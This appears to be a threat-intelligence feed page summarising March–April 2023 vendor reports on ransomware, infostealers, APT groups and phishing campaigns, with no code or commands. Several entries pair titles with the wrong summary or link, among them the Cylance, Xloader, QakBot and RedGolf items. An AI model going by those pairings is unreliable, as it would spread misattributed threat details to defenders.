- Impact:
- LOW
- Summary:
- Researchers from Trustwave SpiderLabs have saw Emotet switch focus to using OneNote attachments, which is a tactic also adopted by other malware groups in recent months. The analysis is intended to help the cybersecurity community better understand the wider obfuscation and padding tricks Emotet is using.
—
- Intel Source:
- Mandiant
- Intel Name:
- ALPHV_Ransomware_Affiliate_Targeting_Vulnerable_Backup_Installations_to_Gain_Initial_Access
- Date of Scan:
- 2023-04-05
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have observed a new ALPHV (aka BlackCat ransomware) ransomware affiliate, tracked as UNC4466, targeting publicly exposed Veritas Backup Exec installations, vulnerable to CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878, for initial access to victim environments.
Source:
https://www.mandiant.com/resources/blog/alphv-ransomware-backup
—
- Intel Source:
- Symantec
- Intel Name:
- Arid_Viper_Hacking_Group_Using_Upgraded_Malware
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Symantec have discovered the threat actor known as Arid Viper has been observed using refreshed variants of its malware toolkit in its attacks targeting Palestinian entities since September 2022.
—
- Intel Source:
- Cyber War Zone
- Intel Name:
- Disney_Phishing_Scams
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Cyber War Zone have identified the latest Disney-related phishing scams in 2023 and provide tips to protect from falling victim to these scams.
Source:
https://cyberwarzone.com/beware-of-disney-phishing-scams-in-2023/?web_view=true
—
- Intel Source:
- Symantec
- Intel Name:
- An_Attack_Against_Palestinian_Targets_Using_New_Weapons
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Symantec have observed that the Mantis APT group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks
—
- Intel Source:
- Sysdig
- Intel Name:
- Proxyjacking_Scheme_Exploits_Log4j_Bug_to_Profit_From_Victim_IP_Addresses
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Sysdig have detected a new attack, dubbed proxyjacking, that leveraged the Log4j vulnerability for initial access. The attacker then sold the victim’s IP addresses to proxyware services for profit.
Source:
https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
—
- Intel Source:
- Checkpoint
- Intel Name:
- New_Ransomware_Rorschach_Targeting_US_Based_Company
- Date of Scan:
- 2023-04-05
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have analyzed the Rorschach ransomware and revealed the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects.
Source:
https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Ransomware_Variants_Are_Dark_Power_and_PayME100USD
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- FortiGate Labs researchers have identified two new ransomware named Dark Power and PayME100USD. Dark Power ransomware launched in early February 2023 and this is a rare ransomware breed in that it was written in the Nim programming language. PayMe100USD ransomware written in Python that was discovered in March 2023 and the malware has basic functionality and performs ordinary ransomware activities.
Source:
https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hacking_Group_RedGolf_Targeting_Windows_and_Linux_Systems
- Date of Scan:
- 2023-04-05
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have identified a Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.
Source:
https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation
—
- Intel Source:
- Talos
- Intel Name:
- Typhon_Reborn_Stealer_Malware_Back_with_Advanced_Evasion_Techniques
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Talos researchers have observed that the threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis.
Source:
https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_Nevada_Ransomware_in_Korea
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- ASEC have identified new cases of the Nevada ransomware while they did some internal monotoring. Nevada is a malware that adds the “.NEVADA” extension to the files it infects is its defining trait. After encrypting directories, it creates ransom notes with the filename “README.txt” in every directory. These notes contain a Tor browser link for ransom payments.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Analyzing_Rhadamanthys_infostealer
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Checkpoint reserachers provided the highlights of the Dark Web ‘buzz’ surrounding this malware. They shared insights which confirm that by the nature of how the malware is used, large orgs are also being subjected to incidental drive-by attacks that have a theoretical potential to escalate. Rhadamanthys is an advanced infostealer which debuted on the dark web in September of last year to a warm critical reception by cybercriminals.
Source:
https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/
—
- Intel Source:
- Sucuri
- Intel Name:
- Vulnerability_in_WordPress_Elementor_Pro_Patched
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have analyzed the WordPress Elementor Pro vulnerability that allows authenticated users to arbitrarily change wp_options values within the database via the AJAX action of Elementor Pro working in conjunction with WooCommerce.
Source:
https://blog.sucuri.net/2023/03/high-severity-vulnerability-in-wordpress-elementor-pro-patched.html
—
- Intel Source:
- Cyble
- Intel Name:
- The_Malware_Sample_Analysis_of_Cl0p_Ransomware
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Cyble researchers have analyzed malware samples as an executable file with a Graphical User Interface (GUI), compiled using Microsoft Visual C/C++.
Source:
https://blog.cyble.com/2023/04/03/cl0p-ransomware-active-threat-plaguing-businesses-worldwide/
—
- Intel Source:
- MalwareHunter, ISC.SANS
- Intel Name:
- IRS_Authorized_Tax_Return_Filing_Software_Caught_Serving_JS_Malware
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Researchers from MalwareHunter have observed the malicious JavaScript file that existed on eFile[.]com website for weeks. It is an IRS-authorized e-file software service provider used by many for filing their tax returns and has been caught serving JavaScript malware.
—
- Intel Source:
- Cyfirma
- Intel Name:
- New_European_APT_Group_Named_FusionCore
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Cyfirma researchers have identified a new European threat actor group known as FusionCore that is running Malware-as-a-service, along with the hacker-for-hire operation, they have a wide variety of tools and services that offered on their website, making it a one-stop-shop for threat actors looking to purchase cost-effective yet customizable malware.
Source:
https://www.cyfirma.com/outofband/the-rise-of-fusioncore-an-emerging-cybercrime-group-from-europe/
—
- Intel Source:
- DFIR Report
- Intel Name:
- MalSpam_Delivering_Malicious_ISO
- Date of Scan:
- 2023-04-03
- Impact:
- LOW
- Summary:
- The DFIR report researchers have observed that IcedID continues to deliver malspam emails to facilitate a compromise, and covers the activity from a campaign in late September of 2022. Post-exploitation activities detail some familiar and some new techniques and tooling, which led to domain-wide ransomware.
Source:
https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Cylance_Ransomware_Targeting_Linux_and_Windows
- Date of Scan:
- 2023-04-03
- Impact:
- LOW
- Summary:
- FortiGate Labs researchers have identified two new ransomware named Dark Power and PayME100USD. Dark Power ransomware launched in early February 2023 and this is a rare ransomware breed in that it was written in the Nim programming language. PayMe100USD ransomware written in Python that was discovered in March 2023 and the malware has basic functionality and performs ordinary ransomware activities.
Source:
https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true
—
- Intel Source:
- CERT-UA
- Intel Name:
- ICS_compromised_Due_to_Installition_of_Unlicensed_Microsoft_Office
- Date of Scan:
- 2023-04-03
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified unauthorized access to the information and communication system (ICS) of one of the utility companies. It is observed that the primary compromise of the computer took place on 19.01.2023 as a result of the installation of an unlicensed version of the software product Microsoft Office 2019.
—
- Intel Source:
- PaloAlto
- Intel Name:
- New_Variant_of_Xloader_Malware
- Date of Scan:
- 2023-04-03
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto have discovered a new ransomware named Cylance Ransomware which is targeting Windows and Linux systems.
Source:
https://twitter.com/Unit42_Intel/status/1641588431221342208
—
- Intel Source:
- ZScaler
- Intel Name:
- Money_Message_Ransomware_Targeting_Worldwide
- Date of Scan:
- 2023-04-03
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new ransomware gang named ‘Money Message’ has appeared, targeting victims worldwide and demanding million-dollar ransoms not to leak data and release a decryptor.
Source:
https://twitter.com/Threatlabz/status/1641113991824158720
—
- Intel Source:
- ASEC
- Intel Name:
- Analyzing_CHM_Malware_Using_EDR
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified an APT attack case that has recently used CHM (Compiled HTML Help File). Threat actors are able to input malicious script codes in HTMLs with the inclusion of CHM and the inserted script is executing through hh.exe which is a default OS application.
—
- Intel Source:
- ASEC
- Intel Name:
- Emotet_Distributing_via_OneNote
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of Emotet being distributed via OneNote. A spear-phishing email as below attached with a OneNote file prompts the reader to open the attachment which contains a malicious script file (JS file).
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_OpcJacker_Malware_Distributing_via_Fake_VPN_Malvertising
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new malware, which we named OpcJacker that is distributing in the wild since the second half of 2022. Its main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes.
—
- Intel Source:
- ASEC
- Intel Name:
- New_Infostealer_LummaC2_Distributing_Under_the_Mask_of_Illegal_Cracks
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified a new Infostealer called LummaC2 that is distributing disguised as illegal programs such as cracks and keygens.
—
- Intel Source:
- Quickheal
- Intel Name:
- The_Deep_Examination_of_Royal_Ransomware
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- QuickHeal researchers have deeply analyzed the Royal Ransomware. It was first observed in mid-2022 and it is a type of ransomware that encrypts all volumes including network shared drives.
Source:
https://blogs.quickheal.com/deep-dive-into-royal-ransomware/
—
- Intel Source:
- Splunk
- Intel Name:
- The_Detection_and_Defense_Technique_of_AsyncRAT
- Date of Scan:
- 2023-04-01
- Impact:
- LOW
- Summary:
- Splunk researchers have analyzed the AsyncRAT and provided the detection and defense technique. It is a popular malware commodity and tool and threat actors and adversaries use several interesting script loaders and spear phishing attachments to deliver AsyncRAT to targeted hosts or networks in different campaigns.
Source:
https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Spreading_ShellBot_and_Moobot_Malware_on_Exploitable_Servers
- Date of Scan:
- 2023-03-31
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard Labs have observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_sample_analyses_Mar_4th_to_11th_2023
- Date of Scan:
- 2023-03-31
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 5th, 2023 to March 11th, 2023 and provide statistical information on each type.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_statistics_March_13_19th_2023
- Date of Scan:
- 2023-03-31
- Impact:
- LOW
- Summary:
- ASEC analysis team used the ASEC automatic analysis system RAPIT to categorize and respond to known malware. Their post covers weekly statistics collected from March 13th, 2023 to March 19th, 2023.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_TACTICAL_OCTOPUS_Attack_Campaign_Targeting_US_Entities
- Date of Scan:
- 2023-03-31
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs researchers have observed that threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.
—
- Intel Source:
- Proofpoint
- Intel Name:
- New_APT_Group_TA473_Exploiting_Zimbra_Vulnerability
- Date of Scan:
- 2023-03-31
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint have observed a newly minted advanced persistent threat actor named TA473, exploiting Zimbra vulnerability CVE-2022-27926 to abuse publicly facing Zimbra hosted webmail portals. The goal of this activity is assessed to be gaining access to the emails of military, government, and diplomatic organizations across Europe involved in the Russia-Ukrainian War.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Defensive_Considerations_for_Lazarus_FudModule
- Date of Scan:
- 2023-03-31
- Impact:
- LOW
- Summary:
- Security Intelligence analysts posted in their blog a focus on highlighting the capabilities for detection of the FudModule within the Lazarus sample analyzed by X-Force, as well as summary of a strategy of using telemetry stream health as a mode of detecting malware designed to impair defenses through ETW tampering.
—
- Intel Source:
- Sentinelone
- Intel Name:
- AlienFox_Toolkit_Stealing_Cloud_Service_Credentials
- Date of Scan:
- 2023-03-30
- Impact:
- HIGH
- Summary:
- SentinelOne researchers have identified a new modular toolkit called AlienFox which allows threat actors to scan for misconfigured servers to steal authentication secrets and credentials for cloud-based email services.
Source:
https://assets.sentinelone.com/sentinellabs22/s1_-sentinellabs_dis#page=1
—
- Intel Source:
- ASEC
- Intel Name:
- ShellBot_Malware_distribution
- Date of Scan:
- 2023-03-30
- Impact:
- MEDIUM
- Summary:
- ASEC researchers has recently observed the ShellBot malware being installed on Linux SSH servers. ShellBot, aka PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems.
Source:
https://asec.ahnlab.com/en/49769/comment-page-2/#comments
—
- Intel Source:
- Sentinelone
- Intel Name:
- Supply_Chain_Attack_on_3CX_Desktop_Apps_Threatens_Millions_at_Risk
- Date of Scan:
- 2023-03-30
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have identified the trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage info stealer DLL.
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_a_OneNote_malware_by_Kimsuky
- Date of Scan:
- 2023-03-30
- Impact:
- LOW
- Summary:
- ASEC has observed the distribution of a OneNote malware mimicking as a form rlinked to compensation. The confirmed file is pretending the same research center as the LNK-type malware mentioned earlier. Based on the identical malicious activity performed by the VBS files, the team came to a conclusion that the same actor the Kimsuky group is behind both incidents.
—
- Intel Source:
- ASEC
- Intel Name:
- ChinaZ_DDoS_Bot_malware_distribution
- Date of Scan:
- 2023-03-30
- Impact:
- MEDIUM
- Summary:
- ASEC has observed the ChinaZ DDoS Bot malware that installed on Linux SSH servers. The ChinaZ group that was discovered in 2014 installs various DDoS bots on Windows and Linux systems. Major DDoS bots suspected that it was created by the ChinaZ threat group include XorDDoS, AESDDos, BillGates, and MrBlack.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Group_Leveraging_Alternate_Data_Stream_to_Hide_Malware
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that the Kimsuky group is using Alternate Data Stream (ADS) to hide their malware. This malware is an Infostealer that collects data by starting the VBScript included inside an HTML file. It can be characterized by its tendency to add the actual code between numerous dummy codes.
—
- Intel Source:
- Mandiant
- Intel Name:
- A_Deep_Dive_into_APT43
- Date of Scan:
- 2023-03-29
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have assessed with high confidence that APT43 is a moderately-sophisticated cyber operator that supports the interests of the North Korean regime. Campaigns attributed to APT43 include strategic intelligence collection aligned with Pyongyang’s geopolitical interests, credential harvesting, and social engineering to support espionage activities, and financially-motivated cybercrime to fund operations.
Source:
https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report
—
- Intel Source:
- Exatrack
- Intel Name:
- New_Linux_Malware_Linked_With_Chinese_APT_Groups
- Date of Scan:
- 2023-03-29
- Impact:
- MEDIUM
- Summary:
- Exatrack researchers have discovered unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers dubbed Mélofée.
—
- Intel Source:
- Medium
- Intel Name:
- New_Threats_Delivering_Through_NullMixer_Malware
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from Medium have identified that the NullMixer malware operation revealed Italy and France are the favorite European countries from the opportunistic attackers’ perspective. They obtained information and data regarding an ongoing malware operation hitting more than 8.000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.
Source:
https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1
—
- Intel Source:
- BitSight
- Intel Name:
- Tofsee_Botnet_Engaging_With_Proxying_and_Mining
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from BitSight have observed a 15-year-old modular spambot called Tofsee being distributed by PrivateLoader (ruzki), a notorious malware distribution service.
Source:
https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining
—
- Intel Source:
- Intezer
- Intel Name:
- Hackers_From_Biter_Group_Targeting_Chinese_Nuclear_Energy_Industry
- Date of Scan:
- 2023-03-29
- Impact:
- LOW
- Summary:
- Researchers from Intezer have observed a cyberespionage hacking group tracked as ‘Bitter APT’ is recently seen targeting the Chinese nuclear energy industry using phishing emails to infect devices with malware downloaders.
Source:
https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Investigation_of_CVE_2023_23397
- Date of Scan:
- 2023-03-28
- Impact:
- HIGH
- Summary:
- Microsoft researchers have provided guidance on where organizations can take to assess whether users have been targeted or compromised by threat actors exploiting CVE-2023-23397. A successful exploit of this vulnerability can result in unauthorized access to an organization’s environment by triggering a Net-NTLMv2 hash leak.
—
- Intel Source:
- AT&T
- Intel Name:
- BlackGuard_stealer_new_variant
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- AT&T Alien Labs researchers have observed a new variant of BlackGuard stealer in the wild, infecting using spear phishing attacks. BlackGuard steals user sensitive information from a wide range of applications and browsers, can hijack crypto wallets copied to clipboard and also try to propagate through removable media and shared devices.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Preta_Cyberespionage_Campaign_Hits_Over_200
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- TrendMicro researchers have analyzed the active campaign delved into the structure, goals, and requirements of the organizations involved, and provided an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_Malware_as_a_Service_platform_Cinoshi
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- Cyble Researchers discovered a new Malware-as-a-Service (MaaS) platform “Cinoshi”. Cinoshi’s storehouse has of a stealer, botnet, clipper, and cryptominer. And now this MaaS platform is offering stealer and web panel for free, and such free services are rarely seen. The accesibility of this free malware services indicates that attackers no longer need technical expertise or resources to launch cyber-attacks.
Source:
https://blog.cyble.com/2023/03/23/cinoshi-project-and-the-dark-side-of-free-maas/
—
- Intel Source:
- ZScaler
- Intel Name:
- DBatLoader_Targeting_European_Businesses_via_Phishing_Email
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new campaign involving DBatLoader also known as ModiLoader that specifically targets manufacturing companies and various businesses in European countries via phishing emails.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_Hunter_obfuscator_used_by_Magecart_skimmer
- Date of Scan:
- 2023-03-28
- Impact:
- LOW
- Summary:
- Malwarebytes reserachers discovered and analyzed a Magecart skimmer that uses Hunter, a PHP Javascript obfuscator. During their investigation, they observed a number of domains all part of the same infrastructure with custom skimmers for several Magento stores.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/03/hunter-skimmer
—
- Intel Source:
- Sentinelone
- Intel Name:
- MacOS_Malware_Targeting_Data_Assets
- Date of Scan:
- 2023-03-27
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that the data assets targeted by macOS malware in some of the most recent in-the-wild incidents in order to help defenders better protect the enterprise and hunt for signs of compromise.
—
- Intel Source:
- Proofpoint
- Intel Name:
- New_Era_of_IcedID
- Date of Scan:
- 2023-03-27
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have observed three new distinct variants of the malware known as IcedID. Proofpoint called these ew variants as “Forked” and “Lite” IcedID , Standard IcedID Variant. IcedID is a malware originally classified as a banking malware and was first observed in 2017. It also performs as a loader for other malware, including ransomware. There are several key differences between initial and new ones. One key difference is the removal of banking functionality such as web injects and backconnect. Proofpoint researchers suspect the original operators behind Emotet are using an IcedID variant with different functionality.
—
- Intel Source:
- Trellix
- Intel Name:
- A_new_ransomware_named_Dark_Power
- Date of Scan:
- 2023-03-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Trellix have identified a new ransomware operation named ‘Dark Power’ that has appeared, and it has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/shining-light-on-dark-power.html
—
- Intel Source:
- Uptycs
- Intel Name:
- New_macOS_based_Stealer_MacStealer_Malware
- Date of Scan:
- 2023-03-27
- Impact:
- LOW
- Summary:
- The Uptycs threat research team has observed aother macOS stealer “MacStealer”. The threat actor who is distributing MacStealer was discovered by the Uptycs threat intelligence team during their dark web hunting. The stealer can extract documents, cookies from a victim’s browser, and login information. It affects Catalina and subsequent macOS versions riding on Intel M1 and M2 CPUs.
Source:
https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware
—
- Intel Source:
- Sentinelone
- Intel Name:
- Chinese_Hackers_Targeting_Middle_East_Telecom_Providers
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- SentinelLabs researchers have observed the use of a well-maintained, versioned credential theft capability and a new dropper mechanism indicative of an ongoing development effort by a highly-motivated threat actor with specific tasking requirements.
Source:
https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/
—
- Intel Source:
- ASEC
- Intel Name:
- MDS_Evasion_Feature_of_Anti_Sandboxes_That_Use_Pop_up_Windows
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- ASEC researchers have monitored various anti-sandbox tactics to evade sandboxes. The persistent anti-sandbox technique exploits the button form of the malicious IcedID Word files and the evasion feature of AhnLab’s MDS which is meant for detecting malicious behavior.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Preta_Changing_its_TTPs_to_Bypass_Security_Solutions
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered Earth Preta delivering lure archives via spear-phishing emails and Google Drive links. After months of investigation, they identified that several undisclosed malware and interesting tools used for exfiltration purposes were used in this campaign.
Source:
https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html
—
- Intel Source:
- Inquest
- Intel Name:
- Exploring_New_Public_Cloud_File_Borne_Phishing_Attack
- Date of Scan:
- 2023-03-25
- Impact:
- LOW
- Summary:
- Researchers from InQuest Labs have analyzed a credential phishing attack discovered by a municipal government organization. The email arrived from a compromised sender account address. The sender organization in the observed samples is the municipality’s county health agency.
—
- Intel Source:
- ASEC
- Intel Name:
- Microsoft_Office_Outlook_Privilege_Escalation_Vulnerability
- Date of Scan:
- 2023-03-25
- Impact:
- HIGH
- Summary:
- Researchers from ASEC have analyzed the Microsoft vulnerability in Outlook for Windows that is being exploited to steal NTLM credentials.
—
- Intel Source:
- Intel471
- Intel Name:
- AresLoader_Linked_With_Russian_APT_Group
- Date of Scan:
- 2023-03-24
- Impact:
- LOW
- Summary:
- Intel471 researchers have observed a new loader malware-as-a-service (MaaS) named AresLoader offered by threat actors with links to Russian hacktivism that is spotted recently in the wild.
Source:
https://intel471.com/blog/new-loader-on-the-bloc-aresloader
—
- Intel Source:
- Mandiant
- Intel Name:
- Diving_Deep_into_UNC961
- Date of Scan:
- 2023-03-24
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have analyzed the details and timeline of each intrusion conducted by UNC961, along with detection opportunities and examples of how Managed Defense’s proactive threat hunting, investigation, and response routinely limits the impact on our customers’ business and prevents their reality from being desecrated.
Source:
https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Kritec_Magecart_Skimmer_Targeting_Magento_Stores
- Date of Scan:
- 2023-03-24
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified instances of compromised stores having both skimmers loaded, which means double trouble for victims as their credit card information is stolen not just once but twice.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/03/new-kritec-skimmer
—
- Intel Source:
- Cyble
- Intel Name:
- SideCopy_APT_group_targets_India_goverment_organization
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- Recently, Cyble researchers discovered a Twitter post of an ongoing campaign by SideCopy APT against the “Defence Research and Development Organisation” of the Indian government. DRDO is a government agency tasked with researching and developing advanced technologies for use by the Indian Armed Forces.
Source:
https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_New_Ransomware_Named_ALC_Ransomware
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified a new strain of malware, named ALC Ransomware, which masquerades as ransomware but is scareware. This malware does not encrypt files on the victim’s machine, but instead disables the task manager, locks the screen, and displays a ransom note.
Source:
https://www.cyfirma.com/outofband/alc-scareware-pretends-to-be-a-ransomware/
—
- Intel Source:
- CISA
- Intel Name:
- A_Detailed_Examination_of_LockBit_From_CISA_and_MS_ISAC
- Date of Scan:
- 2023-03-23
- Impact:
- MEDIUM
- Summary:
- Researchers from CISA and MS-ISAC have warned against the LockBit ransomware. This may involve developing a comprehensive restoration plan, employing robust passwords for all accounts, integrating anti-phishing measures, updating software and system versions, and segregating network components, among others.
Source:
https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf
—
- Intel Source:
- Unit 42
- Intel Name:
- An_Emerging_Ransomware_Strain_Named_Trigona_Ransomware
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- PaloAlto researchers have identified two new Trigona ransom notes in January 2023 and two in February 2023. Trigona’s ransom notes are unique; rather than the usual text file, they are instead presented in an HTML Application with embedded JavaScript containing unique computer IDs (CID) and victim IDs (VID).
Source:
https://unit42.paloaltonetworks.com/trigona-ransomware-update/
—
- Intel Source:
- Cyble
- Intel Name:
- Emotet_Malware_Spreading_via_OneNote_Attachments_to_Deliver_Payloads
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- Cyble researchers have closely monitored the Emotet campaign and identified that is again spreading malicious emails and infecting devices globally by rebuilding its network.
Source:
https://blog.cyble.com/2023/03/17/recent-emotet-spam-campaign-utilizing-new-tactics/
—
- Intel Source:
- Unit42
- Intel Name:
- The_Analysis_of_Hidden_Threats
- Date of Scan:
- 2023-03-23
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have discussed two important ways they have been able to tailor the analysis environment. Threats are continually evolving, and architecting analysis systems as more of a flexible, nicely abstracted software development kit instead of a stand-alone monolithic application is crucial.
Source:
https://unit42.paloaltonetworks.com/tailoring-sandbox-techniques/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Microsoft_OneNote_Attachments_used_by_QakBot_eCrime_Campaign
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/
—
- Intel Source:
- ZScaler
- Intel Name:
- The_Examination_of_the_Attack_Vectors_of_APT37
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have analyzed the APT37 and found it is a threat actor heavily focused on targeting entities in South Korea. It is constantly updating its tactics, techniques, and procedures as is evident from the multiple file types used in the initial stages by it. The themes used by this threat actor range from geopolitics, current events, and education to finance and insurance.
Source:
https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
—
- Intel Source:
- Rapid7
- Intel Name:
- Observed_Exploitation_of_Adobe_ColdFusion
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- Rapid7’s Threat Intell team has observed active exploitation of Adobe ColdFusion in multiple customer environments.
Source:
https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/
—
- Intel Source:
- ASEC
- Intel Name:
- New_ShellBot_DDoS_Malware_Targeting_Poorly_Managed_Linux_Servers
- Date of Scan:
- 2023-03-22
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of malware called ShellBot. ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server.
—
- Intel Source:
- JFrog
- Intel Name:
- Hackers_targeting_DotNET_Developers_With_Malicious_NuGet_Packages
- Date of Scan:
- 2023-03-21
- Impact:
- LOW
- Summary:
- Researchers from JFrog have identified that threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository and impersonating multiple legitimate packages via typosquatting.
